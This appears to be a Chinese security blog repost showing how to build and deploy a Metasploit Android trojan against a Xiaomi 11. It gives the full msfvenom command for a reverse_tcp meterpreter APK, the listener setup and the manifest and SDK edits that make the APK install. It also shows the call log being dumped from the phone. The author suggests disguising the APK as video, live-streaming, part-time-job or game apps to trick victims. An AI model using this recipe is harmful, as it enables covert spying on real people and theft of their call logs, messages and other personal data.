实战|msf对小米11进行安全渗透
2022-10-10 08:32:30 Author: 菜鸟学信安(查看原文) 阅读量:38 收藏

环境配置
实验过程中小米11 未提示风险,(仅签名问题提示非小米应用商店app)但是功能实际都被拦截,无法获取敏感信息,如通话记录,短信等。当开启权限之后,信息被成功获取。如文章最下图实战过程中可以对app进行伪装,修改图标,标题,版本,签名如(XX直播,XX视频,刷赞,兼职,XX游戏等等)

启动kali后,先查看自己本机IP地址如下

┌──(root💀kali)-[~/桌面]└─# ip a                                           1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host        valid_lft forever preferred_lft forever2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000    link/ether 00:0c:29:91:2d:65 brd ff:ff:ff:ff:ff:ff    inet 192.168.0.105/24 brd 192.168.0.255 scope global dynamic noprefixroute eth0       valid_lft 6529sec preferred_lft 6529sec    inet6 fe80::20c:29ff:fe91:2d65/64 scope link noprefixroute        valid_lft forever preferred_lft forever

生成木马

然后执行如下命令生成木马文件.

这里监听了5555端口

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=5555 R >Android.apk

开启msf后,加载攻击载荷

use exploit/multi/handlerset payload android/meterpreter/reverse_tcp#设置监听IPset LHOST 192.168.0.105#设置监听端口set LPORT 5555#进行监听run

这里的apk还无法直接在安卓中运行。

提示如下:

修改木马

通过对apk反编译。

网上说修改AndroidManifest.xml 文件.

不过该文件需要反编译才能查看。推荐使用xml2axml.jar工具进行,该工具可以直接反编译和编译。

这里我们修改apktool.yml

将minSdkVersion修改为16

targetSdkVersion修改为23

对其进行编译

攻击成功

导入手机安装运行之后kali 回显如下内容证明攻击成功。

执行下命令app_list 查看下软件列表,看下用什么app看视频

获取通话记录

meterpreter > dump_calllog[*] Fetching 624 entries[*] Call log saved to calllog_dump_20220824201308.txt

最后

在这里可以通过? 进行查看命令

————————————————

作者:SwBack

原文链接:https://blog.csdn.net/qq_30817059/article/details/126511763

关注公众号后台回复数字 1126 获取 应急响应实战笔记,1127 - ctf工具集合,1230 - 内网工具,3924 - 弱口令爆破工具。

文章来源: http://mp.weixin.qq.com/s?__biz=MzU2NzY5MzI5Ng==&mid=2247492761&idx=1&sn=811347ce5ae37735b7a5591df49cc621&chksm=fc9bfe06cbec7710166787efea14c3557153e5462bbc6d5328f7af40fafec3790b4a9c44a62c#rd
如有侵权请联系:admin#unsafe.sh